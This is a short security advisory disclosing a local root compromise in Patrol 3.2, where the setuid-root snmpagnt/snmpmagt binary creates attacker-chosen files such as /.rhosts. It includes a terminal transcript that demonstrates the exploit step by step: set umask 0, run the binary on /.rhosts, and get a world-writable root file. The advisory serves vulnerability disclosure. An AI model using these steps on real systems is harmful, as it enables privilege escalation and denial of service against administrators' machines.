source: https://www.securityfocus.com/bid/525/info
Patrol 3.2, installed out of the box, allows for a local root compromise or denial of service. The vulnerability lies in the creation of a file by snmpagnt that is owned by the owner of the parent directory of the file and possibly world writeable. A local user can specify any file (/.rhosts) and create it / set the permissions according to the user's umask.
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al snmpmagt
-rwsr-xr-x 1 root users 185461 Mar 6 1998 snmpmagt*
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
/.rhosts not found
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> umask 0
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> snmpmagt yoyoyo /.rhosts
yoyoyo: No such file or directory
snmp bind failure: Address already in use
/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin/snmpmagt: error processing configuration
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
-rw-rw-rw- 1 root users 770 Jul 13 14:42 .rhosts
note: If the file exists, it keeps the same perms and overwrites it
with "i^A" then the result of gethostname() and some whitespace. this
problem is not platform dependent and was tested based on out of box
install on an HP.